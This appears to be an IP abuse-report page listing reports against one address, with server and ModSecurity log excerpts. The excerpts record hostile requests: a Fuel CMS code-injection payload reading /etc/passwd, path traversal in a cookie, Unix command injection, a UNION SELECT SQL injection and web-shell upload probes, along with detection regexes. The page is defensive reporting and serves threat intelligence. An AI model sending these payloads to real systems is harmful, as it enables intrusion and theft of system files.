๐ง๐ท
Sipo Chutรฃo
2025-04-12 03:00:01
(1 year ago)
/dbdump.sql
Hacking
๐ณ๐ฑ
JCB
2025-04-08 14:49:00
(1 year ago)
179.43.186.225 - - [07/Apr/2025:11:32:20 +0300] "POST /php/upload.php HTTP/1.1" 404 196 "-" "Mozilla ...
show more
179.43.186.225 - - [07/Apr/2025:11:32:20 +0300] "POST /php/upload.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36"
179.43.186.225 - - [07/Apr/2025:11:32:21 +0300] "GET /Uploads/2u8UwgIx45rSL64m3OPsslUrWyj.php7 HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
...
show less
Hacking
Web App Attack
Anonymous
2025-04-07 11:16:34
(1 year ago)
[06/Apr/2025:22:01:06 -0400] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b ...
show more
[06/Apr/2025:22:01:06 -0400] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
show less
Hacking
๐ณ๐ฑ
JCB
2025-04-07 08:05:00
(1 year ago)
179.43.186.225 - - [07/Apr/2025:07:27:43 +0300] "POST /login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 ...
show more
179.43.186.225 - - [07/Apr/2025:07:27:43 +0300] "POST /login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.153183"
show less
Web App Attack
๐ซ๐ท
subnetprotocol
2025-04-07 03:56:50
(1 year ago)
07/Apr/2025:05:56:47.597446 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
07/Apr/2025:05:56:47.597446 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\\\\\/])\\\\\\\\.\\\\\\\\.(?:[\\\\\\\\/]|$)" at REQUEST_HEADERS:Cookie. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "72"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd;"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [hostname "212.129.0.235"] [uri "/"] [unique_id "Z_NM_5Axpruiv2VS_Uue5gAAAgs"]
07/Apr/2025:05:56:47.597446 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\\\\\/])\\\\\\\\.\\\\\\\\.(?:[\\
...
show less
Hacking
Web App Attack
๐ซ๐ท
subnetprotocol
2025-04-06 18:16:12
(1 year ago)
06/Apr/2025:20:16:01.916545 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
06/Apr/2025:20:16:01.916545 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. Pattern match "(?:;|\\\\\\\\{|\\\\\\\\||\\\\\\\\|\\\\\\\\||&|&&|\\\\\\\\n|\\\\\\\\r|\\\\\\\\$\\\\\\\\(|\\\\\\\\$\\\\\\\\(\\\\\\\\(|`|\\\\\\\\${|<\\\\\\\\(|>\\\\\\\\(|\\\\\\\\(\\\\\\\\s*\\\\\\\\))\\\\\\\\s*(?:{|\\\\\\\\s*\\\\\\\\(\\\\\\\\s*|\\\\\\\\w+=(?:[^\\\\\\\\s]*|\\\\\\\\$.*|\\\\\\\\$.*|<.*|>.*|\\\\\\\\'.*\\\\\\\\'|\\\\".*\\\\")\\\\\\\\s+|!\\\\\\\\s*|\\\\\\\\$)*\\\\\\\\s*(?:'|\\\\")*(?:[\\\\\\\\?\\\\\\\\*\\\\\\\\[\\\\\\\\]\\\\\\\\(\\\\\\\\)\\\\\\\\-\\\\\\\\|+\\\\\\\\w'\\\\"\\\\\\\\./\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\'\\\\"]*(?:l[\\\\\\\\\\\\\\\\'\\\\"]* ..." at ARGS:service. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: ;curl found within ARGS:service: whatever-control;curl"] [sever
...
show less
Hacking
Web App Attack
๐ธ๐ช
webbfabriken
2025-04-06 09:24:24
(1 year ago)
spam or other hacking activities reported by webbfabriken security servers
Attack reported by Webbf ...
show more
spam or other hacking activities reported by webbfabriken security servers
Attack reported by Webbfabriken Security API - WFSecAPI
show less
Web Spam
๐ณ๐ฑ
JCB
2025-04-05 12:56:00
(1 year ago)
179.43.186.225 - - [04/Apr/2025:09:02:01 0300] "GET /fuel/pages/select/?filter='+pi(print($a='syste ...
show more
179.43.186.225 - - [04/Apr/2025:09:02:01 0300] "GET /fuel/pages/select/?filter='+pi(print($a='system'))+$a('cat /etc/passwd')+' HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
...
show less
Hacking
Web App Attack
๐ฌ๐ง
spamverify.com
2025-04-04 23:56:35
(1 year ago)
Honeypot Hit: Port Scan (80) HTTP
Web Spam
Blog Spam
Bad Web Bot
Web App Attack
๐ซ๐ท
subnetprotocol
2025-04-04 19:36:17
(1 year ago)
04/Apr/2025:21:36:10.690223 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
04/Apr/2025:21:36:10.690223 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'sUEv,' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "66"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: sUEv, found within ARGS:parent: \\\\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/66"] [tag "PCI/6.5.2"] [hostname "212.129.0.235"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "Z_A0quoKcKuml2gkqVPohQAAB5c"]
04/Apr/2025:21:36:10.690223 +0200Apache-Error: [file "apache2_util.c"]
...
show less
Hacking
Web App Attack
๐ฉ๐ช
spyra.rocks
2025-04-04 14:19:48
(1 year ago)
ModSecurity
Web App Attack
๐ธ๐ช
webbfabriken
2025-04-04 09:23:41
(1 year ago)
spam or other hacking activities reported by webbfabriken security servers
Attack reported by Webbf ...
show more
spam or other hacking activities reported by webbfabriken security servers
Attack reported by Webbfabriken Security API - WFSecAPI
show less
Web Spam
๐ซ๐ท
subnetprotocol
2025-04-04 05:53:13
(1 year ago)
04/Apr/2025:07:53:09.877297 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
04/Apr/2025:07:53:09.877297 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:filter. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "98"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.0.235"] [uri "/fuel/pages/select/"] [unique_id "Z-9zxRIvdl65KxUO0UTwiAAABs4"]
04/Apr/2025:07:53:09.877297 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:filter. [file "/etc/apache2/conf.d/modsec_vendor
...
show less
Hacking
Web App Attack
๐ฎ๐ช
RoboSOC
2025-04-04 05:12:50
(1 year ago)
Weaver Ecology-OA Remote Code Execution Vulnerability, PTR: hostedby.privatelayer.com.
Hacking
๐ซ๐ท
subnetprotocol
2025-04-04 00:26:53
(1 year ago)
04/Apr/2025:02:26:43.592333 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
04/Apr/2025:02:26:43.592333 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.186.225] ModSecurity: Warning. Pattern match "(?:;|\\\\\\\\{|\\\\\\\\||\\\\\\\\|\\\\\\\\||&|&&|\\\\\\\\n|\\\\\\\\r|\\\\\\\\$\\\\\\\\(|\\\\\\\\$\\\\\\\\(\\\\\\\\(|`|\\\\\\\\${|<\\\\\\\\(|>\\\\\\\\(|\\\\\\\\(\\\\\\\\s*\\\\\\\\))\\\\\\\\s*(?:{|\\\\\\\\s*\\\\\\\\(\\\\\\\\s*|\\\\\\\\w+=(?:[^\\\\\\\\s]*|\\\\\\\\$.*|\\\\\\\\$.*|<.*|>.*|\\\\\\\\'.*\\\\\\\\'|\\\\".*\\\\")\\\\\\\\s+|!\\\\\\\\s*|\\\\\\\\$)*\\\\\\\\s*(?:'|\\\\")*(?:[\\\\\\\\?\\\\\\\\*\\\\\\\\[\\\\\\\\]\\\\\\\\(\\\\\\\\)\\\\\\\\-\\\\\\\\|+\\\\\\\\w'\\\\"\\\\\\\\./\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\'\\\\"]*(?:l[\\\\\\\\\\\\\\\\'\\\\"]* ..." at ARGS:arg. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: |echo `id found within ARGS:arg: 0|echo `id` #"] [severity "CRITICA
...
show less
Hacking
Web App Attack